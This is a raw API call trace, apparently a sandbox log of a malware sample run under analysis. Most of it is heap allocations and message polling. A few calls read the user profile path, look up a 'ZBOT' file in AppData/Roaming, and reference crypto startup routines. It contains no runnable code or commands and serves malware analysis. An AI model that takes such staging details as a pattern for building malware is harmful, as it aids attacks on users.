1 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0241.318] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0241.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0241.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0241.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0241.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0241.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0241.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0241.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0241.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0241.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50668 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0241.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0241.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0241.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0241.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0241.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0241.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0241.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0241.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0241.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0241.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0241.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.359] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0241.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0241.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0241.359] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZBOT YHAwSRJf tb.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49221180, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xc9d842b0, ftLastAccessTime.dwHighDateTime=0x1d5e779, ftLastWriteTime.dwLowDateTime=0xc9d842b0, ftLastWriteTime.dwHighDateTime=0x1d5e779, nFileSizeHigh=0x0, nFileSizeLow=0x1472a, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ZBOT YHAwSRJf tb.wav", cAlternateFileName="ZBOTYH~1.WAV")) returned 0xa87310 [0241.360] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0241.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0241.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.361] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0241.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0241.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.372] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0241.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0241.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0241.372] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0241.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0241.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0241.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.374] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0241.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 